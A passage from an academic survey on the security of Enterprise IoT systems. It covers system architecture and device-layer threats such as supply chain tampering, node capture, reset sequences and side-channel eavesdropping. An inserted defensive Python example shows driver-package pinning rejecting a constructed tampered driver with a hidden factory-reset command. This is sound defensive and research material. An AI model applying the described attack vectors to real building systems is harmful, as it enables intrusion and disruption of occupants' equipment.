Survey on Enterprise Internet-of-Things Systems (E-IoT): A Security Perspective
Luis Puche Rondon, Leonardo Babun, Ahmet Aris, Kemal Akkaya, A. Selcuk Uluagac
Cyber Physical Systems Security Lab, Department of Electrical and Computer Engineering, Florida International University, Miami, Florida
Email: {lpuch002, lbabu002, aaris, kakkaya, suluagac}@fiu.edu
Keywords — Enterprise IoT Systems, E-IoT, Smart Home, Smart Offices, Protocols, Security, BACnet.

Abstract — As technology becomes more widely available, millions of users worldwide have installed some form of smart device in their homes or workplaces. These devices are often off-the-shelf commodity systems, such as Google Home or Samsung SmartThings, that are installed by end-users looking to automate a small deployment. In contrast to these "plug-and-play" systems, purpose-built Enterprise Internet-of-Things (E-IoT) systems such as Crestron, Control4, RTI, and Savant offer a smart solution for more sophisticated applications (e.g., complete lighting control, A/V management, security). Compared with commodity systems, E-IoT systems are usually closed source, costly, require certified installers, and are overall more robust for their use cases. Due to this, E-IoT systems are often found in expensive smart homes, government and academic conference rooms, yachts, and smart private offices. However, while there has been plenty of research on the topic of commodity systems, no current study exists that provides a complete picture of E-IoT systems, their components, and relevant threats. As such, lack of knowledge of E-IoT system threats, coupled with the cost of E-IoT systems, has led many to assume that E-IoT systems are secure. To address this research gap, raise awareness on E-IoT security, and motivate further research, this work emphasizes E-IoT system components, E-IoT vulnerabilities, solutions, and their security implications. In order to systematically analyze the security of E-IoT systems, we divide E-IoT systems into four layers: E-IoT Devices Layer, Communications Layer, Monitoring and Applications Layer, and Business Layer. We survey attacks and defense mechanisms, considering the E-IoT components at each layer and the associated threats. In addition, we present key observations in state-of-the-art E-IoT security and provide a list of open research problems that need further research.
I. INTRODUCTION
The introduction of modern smart consumer electronics has led to the widespread adoption of smart devices, with over 45 million smart home components sold worldwide [1], [2]. Most users are familiar with commodity systems, off-the-shelf smart systems that are easily installed by the average end-user without specialized training (e.g., Samsung SmartThings, Google Home) [3], [4]. However, in more complex installations, where robust, secure, and reliable smart solutions are needed, Enterprise Internet-of-Things (E-IoT) systems (e.g., Crestron, Control4, Savant, RTI) are accepted solutions. In contrast to commodity systems, E-IoT offers customized deployments, with more use-cases and applications, offering users a broad set of compatible devices (e.g., sensors, Audio/Video equipment, interfaces), protocols (e.g., Zigbee, Z-Wave, IP, proprietary protocols), custom programmed behavior, and system User Interface (UI) customization. As such, E-IoT systems are found in locations such as smart offices, smart buildings, luxury smart homes, yachts, and secure conference rooms (as illustrated in Figure 1).

Fig. 1: Use cases of E-IoT systems in more specialized applications. (a) Conference room with multiple displays and an E-IoT system for control. (b) Yacht installations which use E-IoT smart systems to control lights and A/V. (c) Smart classrooms to control all A/V equipment from a touchscreen. (d) E-IoT homes, which usually include home theaters and smart systems.

arXiv preprint [cs.CR]; submitted to Elsevier AdHoc Networks.

While the security of many emerging commodity systems is well-understood due to prior research and mainstream knowledge, the security of E-IoT systems has been largely overlooked [5]–[33]. As such, the lack of research and awareness, coupled with the cost of devices and installation of E-IoT, has led many users to mistakenly assume that E-IoT systems are completely secure. As E-IoT systems follow a unique design with specialty devices, proprietary software, and a large number of compatible protocols, there is a need to research the unique threats and security of E-IoT systems. Further, E-IoT systems have been increasingly popular in smart installations, with Crestron growing to 1.5 billion dollars of annual revenue in 2018 and Control4 deploying over 15 million smart products in over 400,000 installations worldwide [34], [35]. With many of these systems present in high-profile locations, understanding threats and defense strategies for E-IoT systems should be of great importance. However, no survey focuses on E-IoT system components, attacks, threats, and relevant defenses of E-IoT systems.
We believe that this research gap in the literature is notable considering the prevalence of E-IoT deployments and ever-increasing attacks against smart systems. To address this research gap and analyze the security of E-IoT systems, we first divide E-IoT into four distinct layers: E-IoT Devices Layer, Communications Layer, Monitoring and Applications Layer, and Business Layer. As such, we consider E-IoT components at each layer, the associated threats, attacks, and defense mechanisms. Additionally, we present key observations in E-IoT security and provide a list of open issues that require further research. To the best of our knowledge, this is the first survey focusing solely on E-IoT security and providing a comprehensive review of threats, attacks, and defenses. With this work, we aim to raise awareness on E-IoT system security and motivate further research in this topic.

Although there are existing studies on IoT systems, this survey focuses solely on relevant threats and solutions to E-IoT systems. This study aims to provide users with adequate information on E-IoT system components, vulnerabilities, attacks, and defenses. With this work, we also aim to encourage further research and development from the research community on the topic of E-IoT systems. For instance, our survey highlights widely-used E-IoT proprietary technologies that have seen no security scrutiny and thus have relied on security through obscurity for decades. This survey may be valuable to researchers, E-IoT vendors, users, installers, and manufacturers that want to improve their security practices. Further, users who do not know about E-IoT concepts may find this study a beneficial resource. Ultimately, this survey sheds light on the security implications of E-IoT systems and raises awareness of security practices, protocols, and viable threats against E-IoT systems.

Summary of Contributions: The contributions of this work are as follows:
• We highlight popular E-IoT system platforms and identify security challenges in these systems.
• We categorize and analyze E-IoT components, threats, attacks, and defenses by dividing E-IoT systems into four distinct layers.
• We present the need for further research in E-IoT systems and a number of proprietary technologies used in E-IoT.
• We open discussion on the security of E-IoT systems and related defense mechanisms.
Organization: This work is structured as follows. We begin with the background information of E-IoT, relevant protocols, and the E-IoT layers in Section II. Section III summarizes the scope of this survey. In Section IV we cover the E-IoT devices layer threat taxonomy, vulnerabilities, and defenses. Similarly, in Section V we address the communications layer, Section VI addresses the monitoring and applications layer, and Section VII covers the business layer of E-IoT systems. In Section VIII we highlight the lessons learned from this work and open issues. Related work is presented in Section IX. Finally, we conclude the survey in Section X.

Fig. 2: Architecture of a typical E-IoT solution with user interfaces, controller, and physical devices.

II. BACKGROUND
In this section, we highlight background information of E-IoT systems and the layered architecture of E-IoT systems.
A. Enterprise Internet of Things (E-IoT)
We use the term E-IoT solution to describe a fully-functioning E-IoT system deployment. Figure 2 depicts the general architecture of an E-IoT solution. E-IoT systems have unique design and deployment practices that distinguish them from regular consumer IoT systems. In its most basic form, the E-IoT solution contains four core components: the physical devices, the controller, user interfaces, and drivers. As all installations are custom-made, E-IoT system deployments vary from system to system. The first component of E-IoT systems is the physical devices, which include any device integrated into the central system (e.g., sensors, televisions, lighting modules). To integrate physical devices, E-IoT systems use drivers, which provide the system with all the necessary information to integrate a device into an E-IoT system. Drivers contain information such as model number, protocol type, code, commands, and physical connections. Each device requires a driver to be integrated. In E-IoT systems, the controller serves as the central processing unit and stores all the drivers as well as the user-specific custom programming required for the E-IoT system (e.g., scheduled events). Finally, user interfaces serve as the main point of interaction between users and the E-IoT system. After any third-party devices are integrated, the end-user can use user interfaces such as tablets, phones, and remotes to control integrated devices. For instance, if an E-IoT user wants to turn a light on, he/she may use a phone app as the interface to communicate with the controller. The controller then uses the smart light driver of an integrated E-IoT light to toggle the light at the user's request. As such, many components (e.g., hardware, networking, drivers, proprietary protocols, wireless links) are involved in any E-IoT action.

As designed, E-IoT systems may fulfill different purposes. One such purpose is specialization, such as centralized lighting control systems designed to control electrical loads in locations such as yachts or offices [36], [37]. Another purpose of E-IoT systems is integrating previously separate components into a smart system (e.g., Savant, Crestron, and Control4); integrated components can then work together and interact as a single system [38]. For instance, integrating an alarm system with a lighting system allows a use case such as turning off all the lights when the alarm is activated. As such, E-IoT systems require trained installation and come at a higher cost than standard off-the-shelf systems. This added functionality over commodity systems has led E-IoT systems to become popular in expensive locations such as yachts, classrooms, smart offices, conference rooms, and luxury smart homes, as shown in Figure 3. Further, the installation of an E-IoT system is done by an integrator, a certified installer that performs the physical and software configuration for such a system. The configuration process requires specialized training and tools, which are provided by the system vendor to the integrator [39], [40]. However, hardware and software (e.g., integrated devices and drivers) used in E-IoT may also come from unverified third-party vendors and sources [41].
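Because drivers carry the commands a controller will send on an integrator's behalf, a driver obtained from an unverified third-party source is a natural place for an attacker to add behaviour the integrator never approved. The following is an added illustration, not code from the survey or from any E-IoT vendor: a controller that pins each driver package to a digest in an integrator-maintained manifest and refuses to install anything else. The JSON driver layout, the manifest format and the `Controller` class are assumptions made for the example; the dimmer driver and its commands are constructed sample data.

```python
"""Added example (not from the survey or any E-IoT vendor): pinning driver
packages before a controller installs them.

Assumptions made for illustration only: a driver is a JSON document with
"model", "protocol" and "commands" keys, the integrator keeps a manifest of
approved package digests, and `Controller` stands in for a real controller.
"""
import hashlib
import hmac
import json


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_driver(extra_commands=None) -> bytes:
    """Constructed sample driver for a serial-controlled dimmer (hypothetical)."""
    commands = {"on": "PWR 1\r", "off": "PWR 0\r", "dim": "LVL {level}\r"}
    commands.update(extra_commands or {})
    doc = {"model": "LIGHT-DIM-8", "protocol": "serial", "commands": commands}
    return json.dumps(doc, sort_keys=True).encode()


# The package the integrator reviewed and approved ...
GENUINE_DRIVER = build_driver()
# ... and a copy re-distributed by an untrusted third party with one extra
# command that would let any user interface trigger a factory reset.
TAMPERED_DRIVER = build_driver({"factory_reset": "RST ALL\r"})

# Integrator-maintained manifest: model -> digest of the approved package.
APPROVED_MANIFEST = {"LIGHT-DIM-8": sha256_hex(GENUINE_DRIVER)}


def verify_driver(pkg: bytes, manifest: dict) -> bool:
    """True only if `pkg` is byte-for-byte the approved package for its model."""
    try:
        model = json.loads(pkg)["model"]
    except (ValueError, KeyError, TypeError):
        return False
    expected = manifest.get(model)
    if expected is None:          # unknown model: nothing to pin against
        return False
    return hmac.compare_digest(expected, sha256_hex(pkg))


class Controller:
    """Minimal stand-in for the E-IoT controller's driver store."""

    def __init__(self, manifest: dict, verify: bool = True):
        self.manifest = manifest
        self.verify = verify      # False models a controller with no pinning
        self.drivers = {}

    def install_driver(self, pkg: bytes) -> bool:
        if self.verify and not verify_driver(pkg, self.manifest):
            return False
        drv = json.loads(pkg)
        self.drivers[drv["model"]] = drv
        return True

    def dispatch(self, model: str, action: str, **params):
        """Return the wire command a user-interface action would send, or None."""
        drv = self.drivers.get(model)
        if drv is None or action not in drv["commands"]:
            return None
        return drv["commands"][action].format(**params)


if __name__ == "__main__":
    strict = Controller(APPROVED_MANIFEST)
    print("genuine installed:", strict.install_driver(GENUINE_DRIVER))
    print("tampered installed:", strict.install_driver(TAMPERED_DRIVER))
    lax = Controller(APPROVED_MANIFEST, verify=False)
    lax.install_driver(TAMPERED_DRIVER)
    print("reachable without pinning:", lax.dispatch("LIGHT-DIM-8", "factory_reset"))
```

A digest pin only proves that the package is the one the integrator reviewed; it says nothing about whether that review was adequate, and the manifest itself must be protected from the same third parties (a vendor signature over the package, checked the same way, is the stronger form of this control).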
B. Consumer IoT vs. E-IoT
Commodity IoT smart systems have some limitations (e.g., scale, compatibility), and E-IoT offers a solution for complex and reliable deployments. In this subsection we highlight the differences and benefits of E-IoT and why E-IoT solutions are chosen over commodity IoT. The same differences give E-IoT some unique security concerns and threats. We outline some of these differences in Table I.
Compatibility.
As smart systems grow in scale, a user mustdetermine the best solution to easily control many differentdevices. While commodity systems are limited in scale andcompatible products, there are fewer limitations on what can beintegrated into E-IoT. As E-IoT vendors offer components suchas drivers, which are used to integrate third-party devices withE-IoT systems, many third-party devices are compatible withE-IoT systems. However, from a security standpoint, broadsupport of protocols can pose a threat as an attacker may beable to attack through many available protocols. This is trueas more diverse systems have more possible points of failure.
Complexity.
Commodity smart systems are designed to handle small deployments of IoT devices. While this use case is sufficient for most consumers, commodity smart systems are not a viable solution for large, complex deployments. For instance, multi-room video and audio distribution is one of the more complex applications of E-IoT. With audio/video switchers that can control up to 164 inputs and outputs, E-IoT becomes a reliable way to manage large systems and deployments.

E-IoT systems also allow for a high degree of flexibility and customization. A number of protocols and modes of communication are supported with drivers and expandable hardware components [42]. As a result, E-IoT can integrate more devices than consumer systems. All in all, the unprecedented level of complexity can mean that more vulnerabilities may occur at more stages and sectors of the E-IoT system in comparison to commodity IoT systems.

Fig. 3: Smart building with use-cases in different locations.
Delegation.
As the installation of E-IoT components is often complex, many users opt to have installation and maintenance of E-IoT systems delegated to a dedicated contractor. As such, in a similar manner to electricians, plumbers, and other specialists, E-IoT integrators are contracted only for the installation and maintenance of E-IoT systems. In effect, the end-user does not need to understand the technical details of the E-IoT system; the user only needs to know how to operate the system, removing layers of complexity for any visitors. The delegation of installation and maintenance of E-IoT means that, in addition to technical expertise, integrators must consider the security aspects of E-IoT systems. Thus, clients depend on their hired integrators for the security of their systems. As such, if an integrator is careless or does not keep security in mind, the E-IoT system will be insecure without the owner's knowledge.
Offline Systems.
Some smart systems (e.g., Google Home, Samsung SmartThings) have inherent limitations in their design as they rely on a constant Internet connection to function properly. Some E-IoT deployments may need offline systems to operate where an Internet connection is not desirable or too costly. For instance, a secure conference room may need all the equipment isolated from any network, and yacht installations may have Internet availability that is costly or sporadic. From a security perspective, beyond losing vendor support, isolated systems may not receive security updates and may be prone to exploits if systems are not patched due to limited connectivity. However, isolation can also protect such E-IoT environments from attacks originating from the Internet.
Cost.
As E-IoT requires specialized integrators, custom programming, proprietary hardware, and dedicated technical support, the systems come at a higher cost. Further, the physical installation of E-IoT often involves fully rack-mounted, cable-managed systems throughout a building or home. While consumer IoT solutions are designed to be affordable by end-users, E-IoT installations may be valued at hundreds of thousands of dollars depending on the complexity [43]. The high cost of E-IoT systems may lead some users to wrongly assume their systems are secure.

TABLE I: Commodity IoT vs E-IoT Solutions.

Commodity IoT Solutions | E-IoT Solutions
Simpler, easily deployable solutions | More complex, diverse smart solutions
Less compatible, approved devices | More compatible 3rd-party devices
Lower cost of installation and maintenance | High cost of installation, maintenance, and programming
User-deployed and maintained smart systems | Installer-deployed and maintained smart systems
More often open-sourced, with technical documentation available publicly | Closed-source systems, with no technical documentation available
Often cannot be deployed as completely offline systems | Must be deployed as always-offline systems in some use-cases
C. Architecture of E-IoT Systems
To better analyze E-IoT solution components and relevant threats, we divide E-IoT systems into separate layers as depicted in Figure 4. Specifically, the layered E-IoT solution as described includes four distinct layers: (1) E-IoT Devices Layer, (2) Communications Layer, (3) Monitoring and Applications Layer, and (4) Business Layer. The lowest layer, the E-IoT devices layer, includes the integrated E-IoT devices, physical interfaces used by devices, sensors, and any physical components of E-IoT systems. Next comes the communications layer, which encompasses all the communication protocols (open-source and proprietary) used by integrated devices in the E-IoT devices layer. To manage communication, configuration, software, and programmed events in E-IoT systems, the monitoring and applications layer contains all software-based components (e.g., drivers, E-IoT applications, and configuration software) of E-IoT systems used by integrators and users. Finally, the business layer includes cloud components of an E-IoT system, for instance, remote services or remote storage used by an E-IoT system. The combination of these layers creates a unique technology solution that is highly customizable to any user's need. For instance, with an E-IoT system, a user can configure events such as a good morning timer which simultaneously plays a specific song, opens the shades, and turns on the lights every morning, or a panic button to call the police, blare the alarms, and flash all the lights integrated into a system. Additional details on the four layers are as follows:
E-IoT Devices Layer.
The E-IoT devices layer consists of all physical components of E-IoT systems. A physical component may be physical wiring, sensors, physical interfaces, or connection endpoints. E-IoT systems use many physical devices as part of their systems (e.g., motorized lifts, HVAC, sensors). These devices may be integrated for different applications. In some cases, they may be simply controlled by the system, such as motorized projector lifts. Other cases may be external sensors, such as water leak sensors that automatically shut off water valves to prevent flooding.
Communications Layer.
The communications layer contains all protocols, interfaces, and communication services used by E-IoT systems. This includes protocols in any component of E-IoT systems. To integrate a wide range of smart devices into the central system, E-IoT systems must support a multitude of communication protocols (e.g., Zigbee, Cresnet, Serial) used by smart devices. For instance, to integrate alarm systems into larger E-IoT systems, integrators will often use serial-based adapters or an available IP interface [44], [45].

Fig. 4: E-IoT system four-layer model used in this survey.
Monitoring and Applications Layer.
The monitoring and applications layer contains the software-based components of an E-IoT system. For instance, E-IoT system configuration, drivers, firmware, and programmable behavior can all be considered part of this layer. E-IoT systems must have the capability to be customized for every installation. As all deployments may be different and fit for different purposes, custom applications are a large part of E-IoT systems.
Business Layer.
The topmost layer for E-IoT systems is the business layer, which handles all external cloud services used by E-IoT solutions. Not every implementation uses this layer: some E-IoT use-cases require an "always offline" configuration after being deployed (e.g., yachts, remote locations, secure locations). Where it is present, E-IoT systems rely on cloud computing and online services for features and integration. Cloud services provide E-IoT systems with expanded capabilities, remote connections, and other services. For instance, E-IoT systems with CCTV components may use cloud storage services to store video feeds in case the local video recorder is damaged or stolen [46].

III. SCOPE OF THE SURVEY
In this section, we highlight the topics covered in this survey. While covering the topics that are closely related to E-IoT, we do not consider topics that are not directly related to E-IoT or that are common to general computer systems in the scope of this study.
Scope of E-IoT Devices Layer.
For the E-IoT devices layer section, we cover attacks (e.g., sensory attacks, node theft, battery exhaustion) and defense mechanisms that target components at the E-IoT devices layer. Included in these topics are E-IoT devices, supply chain attacks, and physical access attacks relevant to E-IoT systems. Topics outside the scope of the E-IoT devices layer are attacks on chipsets (e.g., processor side-channel attacks) and other physical devices that are either already widely researched or not unique to E-IoT.
Scope of Communications Layer.
This survey covers commu-nication interfaces, publicly-documented protocols, proprietaryprotocols, and other relevant communication components aspart of the communications layer. As such, this survey coversjamming attacks and other well-known attacks against publicand proprietary protocols used in E-IoT. Finally, communica-tion protocols such as TCP/IP, cellular communication, long-range radio protocols such as LoRaWAN, and their respectiveattacks are outside of this survey’s scope as they are notcommon in E-IoT use-cases.
Scope of Monitoring and Applications Layer.
Topics in the monitoring and applications layer include E-IoT software, configuration, and software services. Topics outside of this layer's scope are operating systems, as they are a common topic of research and not exclusive to E-IoT systems. For instance, Linux-based operating systems are common in E-IoT and other smart systems, making Linux a common topic of research. Also outside of this layer's scope are web-based DDoS attacks, mobile application threats, ransomware, firmware attacks, and common software vulnerabilities.
Scope of E-IoT Business Layer.
Relevant topics to the E-IoT business layer include remote access cloud services, maintenance services, and CCTV data storage. As the E-IoT business layer is not employed by all E-IoT systems, and cloud security is a diverse field, some topics are not covered. Topics outside of this survey's scope are encrypted storage access, computation of stored E-IoT content in cloud environments, online microservices, advanced persistent threats, virtualization technologies, general data storage, and other cloud concepts that are uncommon for E-IoT.

IV. E-IoT DEVICES LAYER: COMPONENTS AND SECURITY
In this section, we cover the E-IoT Devices layer, threats,defenses, and their implications. First, we introduce compo-nents of the E-IoT devices layer, and then cover threats andattacks. Finally, we give an overview of possible defense andmitigation mechanisms. Table II provides an overview of E-IoT Device-layer components, threats, attacks, and mitigationstrategies covered in this section.
A. Elements of the E-IoT Devices Layer
E-IoT Devices.
Many devices, such as sensors and lightingcontrollers, are integrated into E-IoT systems to expand the usecases and functionality. Integrated devices may serve specificpurposes (e.g., television, media player) or be a part of largeruse-cases such as power control modules for lighting controlsystems.
Sensors.
E-IoT and E-IoT-integrated devices will very oftenhave sensors used to trigger programmed actions in an E-IoT system. Sensors may play a role in E-IoT in severaldifferent ways. For instance, individual sensors (e.g., glassbreak, motion, contact) can be integrated directly into an E-IoT system thanks to the official support of E-IoT vendorsfor several protocols (e.g., ZigBee, Bluetooth, Z-wave) [107]–[109]. In addition, an external system, such as an alarmsystem, can be configured to work with an E-IoT deployment.For instance, an E-IoT deployment with water leak detectionsensors and automated valves can be configured to close aleak, inform the user via text, and display a message on E-IoTinterfaces about the issue [110].
B. Threat Model for E-IoT Devices Layer
For this layer, Mallory compromises the E-IoT systemsolely through physical access to interfaces, devices, cabling,and unattended equipment. To compromise an E-IoT systemthrough the E-IoT devices, Mallory is assumed to have phys-ical access to devices during the manufacturing, installation,operation, or maintenance stages of the E-IoT system. Malloryis capable of this, as security for device-layer components inE-IoT environments relies on the specific devices and the inte-grator’s installation practices (e.g., directional antennas, accessrestriction, tamper-proofing). We explain Mallory’s possibleactions at different stages of the E-IoT devices as follows:
Manufacturing and Transportation.
In the manufacturing ortransportation stages of E-IoT equipment, Mallory may haveseveral opportunities to compromise a device. During thesestages, insiders (e.g., manufacturing workers, delivery drivers,packaging personnel) all have direct access to the E-IoTdevice before a device is installed, making supply chainattacks possible for Mallory, who may be in the role of aninsider attacker. Further, Mallory could be an employee ofoutsourced manufacturing, and as such, it may be particularlydifficult to prosecute Mallory during the manufacturing andtransportation stages. In this role, Mallory may target E-IoTdevices specifically if she has prior knowledge that E-IoTcomponents may be installed in sensitive locations (e.g., secureconference room, access control, enterprise network).
Deployment, Operation, and Maintenance.
E-IoT installationsmay see visitors such as presenting guests or maintenanceworkers that have direct access to E-IoT equipment. As such,Mallory as a visitor may perform a node capture attack andfurther compromise an E-IoT system. Additionally, if Malloryis a more knowledgeable attacker, she may perform sensorychannel and side-channel attacks. In other roles, such as a rolewhere Mallory is an IT professional, she could compromisedevices in the same manner.
C. E-IoT Devices Layer: Attacks and Vulnerabilities
In the following subsection, we cover attacks and vulnera-bilities relevant to the E-IoT devices layer. These attacks canbe performed by Mallory as highlighted in the threat model.
TABLE II: Overview of E-IoT Devices Layer Attacks, Threats, and Mitigations.

Component | Attack/Threat | Mitigations
Supply Chain | Supply Chain Attacks [47]–[59] | RFID tagging during manufacturing and transport [60]–[62]; novel secure supply chain architectures [63]; other supply chain attacks and defenses are summarized in Table III.
Physical Attacks | Reset Sequence Attacks [64], [65] | Limiting device access, device monitoring, and access control.
Physical Attacks | Node Capture Attacks [66]–[73] | Limiting device access, device monitoring, access control, and loss prevention practices [74].
Side and Sensory Channels | EM Attacks [75]–[79] | Best installation practices, directional antennas [80].
Side and Sensory Channels | Video Side-Channel [81], [82] | Software-based solutions may help mitigate several video-based side-channel attacks [83]–[87].
Side and Sensory Channels | Sensory Side-Channel Attacks [88]–[96] | Dedicated machine-learning frameworks [18], [97], [98].
Battery Exhaustion | Battery Exhaustion Attacks [99]–[102] | IDS frameworks such as MVP-IDS and B-SIPS [101], [103]; IDS-based solutions designed to protect against battery exhaustion [104], [105]; rate limiting solutions [106].

Supply Chain Attacks.
Even before E-IoT devices reach integrators, installers, and consumers, devices may be compromised during manufacturing and distribution stages. Several articles have highlighted supply chain threats and provided examples of how systems in different industries (e.g., medical, banking) have been targeted and compromised through supply chain attacks [47]–[52]. As specific industries have been targeted, it is reasonable to assume that E-IoT systems may be a future target for supply chain attacks. With the price-point of E-IoT systems and high-profile clients, attackers may find E-IoT systems an attractive target for supply-chain attacks. Work by Farooq et al. analyzed the risks and research challenges in IoT supply chain security [53]. This work highlighted three types of interactions in the supply chain: device-supplier interactions, supplier-supplier interactions, and device-device interactions. In device-supplier interactions, a supplier provides maintenance, security patches, and upgrades to devices. Supplier-supplier interactions are when suppliers use different companies to distribute devices.
Finally, device-device interactions occur due to the inter-connectivity of devices in the supply chain, that is, communication between devices (e.g., configuration) in the supply chain. As such, an attacker could compromise a device at any of these interactions. The UK's National Cyber Security Centre highlighted several attacks that can occur from supply chain interactions [54]. For instance, malware inserted into vendor websites or devices can "trojanize" devices before the devices leave the supply chain. As compromised software is very difficult to detect at the source, target companies may not suspect that the software is altered or illegitimate. Supply chain threats also extend to embedded hardware such as chipsets, unauthenticated parts, and counterfeit components inserted into the supply chain. These counterfeit components may impact systems by being of lower quality [55]. In other cases, hardware threats extend to hardware trojans, which have been an ongoing topic of research [56]–[58]. In this case, malicious chipsets and electronic components are inserted into devices, usually during manufacturing stages, compromising the integrity of the device. Attacks of this type have been reported, notably in a widely publicized (and subsequently disputed by the companies named) case in which Chinese manufacturers were alleged to have infiltrated around 30 large U.S. companies using malicious hardware components embedded in networking devices [59]. As such, E-IoT can easily become a target for a variety of supply chain attacks, as the distribution, manufacturing, and installation stages of E-IoT provide ample opportunity to compromise E-IoT devices.
Physical Attacks.
In any E-IoT deployment, E-IoT devices will be found throughout the location or establishment. Some of these devices may be installed in private, unsupervised areas (e.g., a keypad in a closet, an empty conference room). As such, it may be possible for visiting attackers to interact with physical devices integrated into E-IoT systems, and several vulnerabilities against physical devices rely on exactly this physical access to E-IoT devices and interfaces (e.g., node capture, tampering, button resets, theft). Physical access to devices and E-IoT components may allow an attacker to perform malicious actions on E-IoT devices, such as enabling programming mode, performing hard resets, or otherwise changing the configuration of E-IoT devices in ways that render them inoperable. For instance, "button sequences" may present a vulnerability to E-IoT devices. Reset sequences are used for purposes such as changing a device's configuration, resetting a device to factory settings, or even gaining information about devices [64], [65]. As such, an attacker can use these sequences to alter physical devices' configuration, gather information, or otherwise cause E-IoT components to become unavailable to the E-IoT system.

Physical access to E-IoT devices allows malicious actors to perform node capture attacks, where devices are physically captured (or stolen) to gather sensitive information about a system [66]. Although there is no study on node capture attacks in E-IoT, attacks applied in related domains may be applicable to E-IoT as well. In this respect, work by Wang et al. covered the implications of node capture attacks in wireless sensor networks (WSNs), which are relevant to wireless E-IoT devices (e.g., sensors, interfaces, remotes) as they often share similar communication technologies [67]. The authors of the work identified ten unique vulnerabilities that can be exploited through node capture attacks affecting session keys, users, sensor nodes, gateways, and availability of the network.
Assuch, the attacks could acquire communication keys, eavesdropon messages, impersonate devices, track user activity, andimpersonate users. Several other pieces of literature havediscussed node capture attacks that exploit vulnerabilities togather keys from connected devices [68]–[73]. The work ofLin et al. focused more on the efficiency of node captureattacks and introduced the full graph attack (FGA), with twooptimal algorithms for this attack [111]. The attack specializesin compromising relationships between nodes and paths. Assuch, the attacks reportedly increased the efficiency by 50%compared to previously proposed attacks.
Side-Channel and Sensory Channel Attacks.
Submitted to Elsevier AdHoc Networks. L. Puche Rondon, L. Babun, A. Aris, K. Akkaya, A. S. Uluagac
Side-channel attacks are threats against the implementation of computer systems, rather than inherent weaknesses. These attacks allow attackers to compromise a system or component through an indirect channel (e.g., timing information, power consumption, electromagnetic leaks, auditory channels) [75]. A number of E-IoT components may be vulnerable to side-channel attacks through electromagnetic (EM) approaches. For instance, a study by Smulders et al. on serial-based communication suggested that electromagnetic radiation can be used to eavesdrop on physical cables and serial-based communication as a type of side-channel attack [76]. These methods take advantage of the known fact that most electronic equipment emits electrical radiation, and that bit amplitude in serial-based communication is relatively larger than other signals [77]. Their tests, performed with a standard AM/FM receiver antenna, allowed intercepting and reading signals going through the wire. The work concluded that data signals transmitted over serial-based communication could be intercepted from several meters away. Further, this work noted that the equipment required to perform these scans is inexpensive and readily available; as such, similar attacks may be possible in similar unsecured networks with improved equipment and techniques. Legacy systems, or systems without authentication or encryption, may be especially vulnerable to these or similar attacks. Electromagnetic attacks are not limited to wiring, as work published as early as 1986 by Eck et al. noted that electromagnetic radiation eavesdropping attacks are possible on video display units [78]. Further work by Kuhn et al. noted that while technology has changed, electromagnetic eavesdropping can work on more modern LCD displays [79]. Researchers have found other ways to compromise systems that may be relevant to E-IoT. For instance, Savage et al. showed that with recorded video (e.g., from a CCTV system, intercom systems), an attacker could use passive sound recovery to eavesdrop on conversations [81]. Further work by Davis et al. demonstrated that an attacker could also use vibrations on object surfaces for eavesdropping under certain conditions (e.g., visible glass or water) [112].
As E-IoT may control smart lights, light-emitting devices, and light sensors, threats posed by visible-light side-channels may affect E-IoT deployments. Information leakage through optical side-channels has been an active topic of research. For instance, Xu et al. created a video recognition attack where they were able to identify a video being watched on a television using the light emitted by the television through a window [82]. Similar works, as presented by Schwittmann et al., used ambient light sensors on smartphones and smartwatches to perform similar attacks [88], [89]. Alternatively, Light Ears, presented by Maiti et al., proposed a new attack vector designed to infer a user’s private data and preferences from smart lighting media visualization features [90]. Based on this research, researchers used the light and sound intensity of smart lights to infer ongoing audio and video. Alternatively, covert optical channels have been researched, with Loughry et al. providing the first call of attention to possible information exfiltration attacks on air-gapped systems by using LED light indicators [95]. Similar data-exfiltration attacks have been demonstrated using LCD displays, security camera infrared lights, scanners, and smart lights [91]–[94], [96].
As E-IoT systems rely on sensors for accurate measurements and to trigger pre-programmed events, physical sensor threats are a concern for E-IoT. Sensor threats and security have been an active topic of research with multiple surveys. However, most of these surveys focus on sensor communication and wireless sensor networks [113]–[123].
As sensors are a vast research topic, different attacks and vulnerabilities on sensors have been discovered that can be applicable to E-IoT. Analog threats such as sound waves can maliciously influence an accelerometer’s output and cause unintended effects in an E-IoT system configured to respond to specific readings [124]. Other proposed attacks, such as DolphinAttack, which targets microphones through inaudible voice commands, can be effective against E-IoT systems that integrate voice recognition and microphones [125]. With many sensors lacking security mechanisms, E-IoT systems may be particularly vulnerable to sensor attacks. Work presented by Uluagac et al. summarized several sensory channels in cyber-physical systems (CPS) and devices that can be targeted by an attacker [126]. These channels are the light, seismic, acoustic, and infrared channels. The light channel functions through light sensors and ambient light temperatures. The light channel may be used in E-IoT to trigger programmed events at nighttime. Seismic channels are vibrational channels that can be detected by devices such as accelerometers, which detect the physical movements of a device. Acoustic channels are based on sound waves and can be comparable to sonar technologies. Finally, infrared channels use infrared emitters for navigation assistance and can present a covert side-channel for attacks as infrared is not visible to the human eye. Further, this work highlighted that these sensory channels can all be used to trigger existing malware and that traditional security mitigation strategies do not defend against sensory channel attacks.
Other physical attacks on sensors rely on multiple sensors to function. One of the most researched examples is keystroke inference on devices with unprotected sensors [127]–[141]. While keystroke inference research centers around mobile devices, it may be relevant to E-IoT. Many E-IoT interface devices (e.g., dedicated touchscreens, keypads, remotes) have similarities with mobile devices as they possess several sensors and receive user input. Many of these keystroke inference attacks rely on multiple sensors in different sensor channels to infer sensitive information (e.g., what a user is typing from sensor activity). For instance, PitchIn, a work presented by Han et al., proved that exploiting non-acoustic sensors used in smart environments can allow an attacker to perform speech reconstruction attacks [142]. Multiple sensors (e.g., geophones, accelerometers, gyroscopes) were used to reconstruct audio and perform word recognition in the mentioned work.
Battery Exhaustion Attacks.
